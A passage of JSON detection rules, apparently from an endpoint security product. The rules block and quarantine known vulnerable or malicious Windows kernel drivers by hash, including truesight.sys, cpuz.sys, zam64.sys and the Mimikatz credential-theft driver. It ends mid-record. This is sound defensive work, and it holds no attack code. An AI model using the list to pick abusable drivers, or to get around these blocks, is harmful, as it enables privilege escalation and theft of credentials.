+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a71e7ecde0a642339d61eebea2adecb3ccdcab0249b739831556e6e95661c7ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "201aa671-0ada-52a8-a1ef-ebebfac173ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497671Z",
+ "creation_date": "2026-03-23T11:45:31.497673Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b36758b96ce1afd3328aec3f4e5808cc2b47d80894032ffa7de14c4767f1f39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "201b1d5b-01b2-51e9-9798-12be5c18f4bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475571Z",
+ "creation_date": "2026-03-23T11:45:31.475574Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "acca6bbdabb64fdba72f37038a2d342859e56f55f493bbce5097ccd7093d9312",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "201daf13-5e98-58ba-875f-4a59394ebb27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822854Z",
+ "creation_date": "2026-03-23T11:45:30.822856Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e24c45ce2672ee403db34077c88e8b7d7797d113c6fd161906dce3784da627d",
+ "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2033770c-1838-5069-a2bf-159d9044391d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817382Z",
+ "creation_date": "2026-03-23T11:45:30.817384Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817389Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffd548833a96c2c5f8410b22fc110d10b36a47eb0b16b3d2e7edb82c3cabf97b",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20364d36-bfec-587d-ba39-2952d2eda0e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985430Z",
+ "creation_date": "2026-03-23T11:45:29.985432Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985438Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04cfb452e1ac73fb2f3b8a80d9f27e19a344a6bf0f74c7f9cae3ae82d3770195",
+ "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "204bc6a4-1e59-5593-8126-1f496a4edc33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826514Z",
+ "creation_date": "2026-03-23T11:45:30.826516Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826522Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "95542b32e0881e08e87fd38310f598cacfb37f7fc57b8d7d919a6707b175dbd2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "204bec7c-e9d7-571d-aeaa-be990f5d6941",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159868Z",
+ "creation_date": "2026-03-23T11:45:31.159884Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159889Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64c27a36524d1967e9ba2515976823e4471583225676b61ee8b3c87cfa4138e5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20521ede-ccba-5518-8d92-76a7e12e8a09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156980Z",
+ "creation_date": "2026-03-23T11:45:31.156982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6fc0c630eb1778687bc1eb56a4b735b1ad39f21b607e5e15544191b8ef8b5fa4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "205c3118-5668-5a16-a634-3d557bb910e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970677Z",
+ "creation_date": "2026-03-23T11:45:29.970680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970687Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da5135871e9e0004bb60d0be31f8d96988f9b82025abccadfd87c937df22686b",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2064be61-c105-5f1b-a7be-76852e4c4653",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616095Z",
+ "creation_date": "2026-03-23T11:45:29.616097Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8797d9afc7a6bb0933f100a8acbb5d0666ec691779d522ac66c66817155b1c0d",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2070dbe7-d41a-5595-80c3-2e31c5675829",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481785Z",
+ "creation_date": "2026-03-23T11:45:30.481787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df96d844b967d404e58a12fc57487abc24cd3bd1f8417acfe1ce1ee4a0b0b858",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "207e873f-2466-5b0c-ab29-636013f5cc7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145187Z",
+ "creation_date": "2026-03-23T11:45:32.145189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "981d03e19f14de0ccffef8fa974797d9cdfef6dafc7349d9bbf27434dc16dede",
+ "comment": "Malicious Kernel Driver (aka driver_981d03e1.sys) [https://www.loldrivers.io/drivers/1106fe7a-b78b-4edf-85c0-6208979f380b/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "208270f5-4aef-5e1b-ad33-ff9421905b42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830598Z",
+ "creation_date": "2026-03-23T11:45:30.830600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830605Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f9d76e1257b1cfdb8028809f1cf5da0bcbb33d07deedc7e95c5953dd3f195e1a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2083c1bb-1f44-55f1-9dc0-665e87b26e90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810681Z",
+ "creation_date": "2026-03-23T11:45:31.810683Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810688Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54467b895627b5b6abb457ba20fe497244d152cae3881a35ea30231f09dde0a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2097b4cf-7433-575b-8d0f-abbc04f187b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143024Z",
+ "creation_date": "2026-03-23T11:45:32.143026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ede9a3858a12d5ddea21a310e5721bf86c2248539f42c9e0c3c29ae5b0148ba5",
+ "comment": "Vulnerable Kernel Driver (aka msr.sys) [https://www.loldrivers.io/drivers/ee6fa2de-d388-416c-862d-24385c152fad/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "209f285a-1d37-5d25-af91-0eb03e16efd2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474445Z",
+ "creation_date": "2026-03-23T11:45:30.474448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474457Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2145851bdcbf8419f09fd7470422dd56be1b415b15f39f0632bdd797cf500b36",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20a147ce-5f18-5f72-9002-144eecb11455",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151887Z",
+ "creation_date": "2026-03-23T11:45:31.151891Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151900Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4f8b32786de3bf22e92144ed115b6800e03568944fe95699b9002db04e13a20a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20a20d07-6896-5ce7-8679-08757e3f90ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971390Z",
+ "creation_date": "2026-03-23T11:45:29.971394Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8fe9828bea83adc8b1429394db7a556a17f79846ad0bfb7f242084a5c96edf2a",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20a23836-f4df-5dda-88dd-5fb75db9bbdb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485038Z",
+ "creation_date": "2026-03-23T11:45:31.485042Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485051Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73fcab1ad989ed08cf3c054a29b474fe5a39b1fb145ca34decd553433bff8210",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20b6dda7-f766-5a2f-b985-444b9ea6f6ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494023Z",
+ "creation_date": "2026-03-23T11:45:31.494026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494036Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aee1f887d981f49b4b6e0d60c195b6a96da3f1ff005ad78c11c4ab35ae9f983f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20b8dffb-7297-5156-91a6-849a46ea10d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615186Z",
+ "creation_date": "2026-03-23T11:45:29.615188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615193Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b08a501124d13262c86889617071743521aeefc2d77f678d541aa8dbad52992",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20be698d-bd18-5449-a0c4-73da695ab941",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979675Z",
+ "creation_date": "2026-03-23T11:45:29.979677Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979682Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0801ade5de44b65afb8c275e11e4d766ae64af1a5740ad4f1db1acc4e088774",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "20c54db1-d889-57e5-9206-e0f68a9851f5",
